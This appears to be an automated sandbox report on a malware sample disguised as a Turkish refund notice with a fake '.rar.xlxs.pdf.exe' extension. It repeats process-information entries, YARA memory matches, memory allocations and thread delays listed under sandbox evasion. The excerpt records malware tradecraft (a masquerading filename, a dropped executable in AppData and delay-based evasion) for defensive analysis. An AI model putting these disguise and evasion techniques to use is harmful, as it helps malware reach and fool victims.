                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: GeriOdemeBildirimi942.rar.xlxs.pdf.exe PID: 5648, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SOFcFE.exe PID: 7376, type: MEMORYSTR
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 1080000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 2EA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 77C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 87C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 8960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 9960000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: A090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: B090000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 1160000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 2C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeMemory allocated: 4C20000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 2630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 28A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 26A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 6DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 7DB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 7F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 8F30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 9630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: A630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: B630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 13E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 2D90000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Roaming\SOFcFE.exeMemory allocated: 4D90000 memory reserve | memory write watch
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599858Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599734Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599613Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599474Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599350Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599242Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 599138Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 598874Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 598000Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597853Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597732Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597624Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597296Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596968Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596749Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596531Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596421Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596312Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596203Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 596093Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595984Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595873Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595765Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595656Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595542Jump to behavior
                Source: C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exeThread delayed: delay time: 595405Jump to behavior
